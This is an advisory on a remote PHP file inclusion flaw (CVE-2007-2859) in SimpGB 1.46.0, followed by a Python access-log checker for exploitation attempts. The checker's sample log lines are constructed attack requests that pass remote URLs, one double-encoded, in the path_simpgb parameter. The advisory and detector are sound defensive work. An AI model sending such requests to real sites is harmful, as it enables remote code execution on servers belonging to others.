PT-2007-4163 · Simpgb · Simpgb

Published: 2007-05-24 · Updated: 2024-02-14 · CVE-2007-2859

CVSS v2.0: 7.5 (High)

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions

SimpGB version 1.46.0

Description

The issue allows remote attackers to execute arbitrary PHP code via a URL in the path_simpgb parameter to various PHP scripts, including "guestbook.php", "search.php", "mailer.php", "avatars.php", "ccode.php", "comments.php", "emoticons.php", and "gbdownload.php".

Recommendations

For SimpGB version 1.46.0, consider restricting access to the path_simpgb parameter in the affected PHP scripts until a patch is available. As a temporary workaround, avoid using the path_simpgb parameter in the affected scripts.
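
A log check that supports the recommendation above, as an added example that is not part of the original advisory or of SimpGB: it flags requests that pass a URL in the path_simpgb query parameter. The combined access-log format, the sample lines and the script name other.php are constructed assumptions; values sent in POST bodies do not appear in access logs and are not covered.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts named in the advisory; it says "including", so the list may be partial.
NAMED = {"guestbook.php", "search.php", "mailer.php", "avatars.php",
         "ccode.php", "comments.php", "emoticons.php", "gbdownload.php"}
PARAM = "path_simpgb"
# A value that starts with scheme:// (http, https, ftp, ...) is a URL.
URL_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)
# Client address and request target of a combined-format log line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def find_suspicious(lines):
    """Return (client, script, value, named) for requests with a URL in PARAM."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        script = parts.path.rsplit("/", 1)[-1].lower()
        if not script.endswith(".php"):
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            # parse_qs decodes once; decode again to catch double-encoded values.
            decoded = unquote(value)
            if URL_VALUE.match(decoded):
                hits.append((client, script, decoded, script in NAMED))
    return hits

# Constructed sample log lines (documentation addresses, reserved .invalid host).
SAMPLE = [
    '203.0.113.7 - - [24/May/2007:10:00:01 +0000] "GET /gb/guestbook.php?path_simpgb=http://files.example.invalid/x.txt HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [24/May/2007:10:00:02 +0000] "GET /gb/search.php?path_simpgb=http%253A%252F%252Ffiles.example.invalid%252Fx HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [24/May/2007:10:00:03 +0000] "GET /gb/guestbook.php?page=2 HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.4 - - [24/May/2007:10:00:04 +0000] "GET /gb/guestbook.php?path_simpgb=./ HTTP/1.1" 200 2048 "-" "-"',
    '192.0.2.9 - - [24/May/2007:10:00:05 +0000] "GET /gb/other.php?path_simpgb=ftp://files.example.invalid/x HTTP/1.1" 200 100 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE):
        print(hit)
```

The last field of each hit tells whether the script is one of the eight the description names, so requests to other scripts carrying the same parameter are still reported.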

Fix

Related Identifiers

CVE-2007-2859

Affected Products

Simpgb